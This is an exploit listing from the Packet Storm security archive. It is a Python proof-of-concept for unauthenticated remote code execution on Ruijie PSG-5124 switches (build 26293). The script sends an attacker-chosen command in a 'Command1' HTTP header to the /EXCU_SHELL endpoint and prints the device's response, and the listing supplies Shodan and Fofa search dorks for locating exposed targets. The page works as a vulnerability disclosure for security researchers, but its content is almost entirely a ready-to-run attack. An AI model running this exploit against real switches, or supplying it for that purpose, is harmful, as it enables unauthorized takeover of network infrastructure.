what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ruijie Switch PSG-5124 26293 Remote Code Execution

Ruijie Switch PSG-5124 26293 Remote Code Execution
Posted Mar 14, 2024
Authored by ByteHunter

Ruijie Switch version PSG-5124 with software build 26293 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | 31f3b0a900318bec9de9a1e9f67d893c6b3f4c63a3437484a3559c375ebb2fa0

Ruijie Switch PSG-5124 26293 Remote Code Execution

Change Mirror Download
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)

import http.client
import argparse

def send_request(ip, port, command):
headers = {
"Host": f"{ip}:{port}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"DNT": "1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Cmdnum": "1",
"Confirm1": "n",
"Content-Length": "0",
"Command1": command
}

try:
connection = http.client.HTTPConnection(f"{ip}:{port}")
connection.request("GET", "/EXCU_SHELL", headers=headers)
response = connection.getresponse()


print(f"Status Code: {response.status}")
print(response.read().decode('utf-8'))
connection.close()

except Exception as e:
print(f"Request failed: {e}")

if __name__ == "__main__":

parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
parser.add_argument('--ip', help='Target IP address', required=True)
parser.add_argument('--port', help='Port', required=True)
parser.add_argument('--cmd', help='Command', required=True)
args = parser.parse_args()


ip = args.ip
port = args.port
command = args.cmd


send_request(ip, port, command)


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close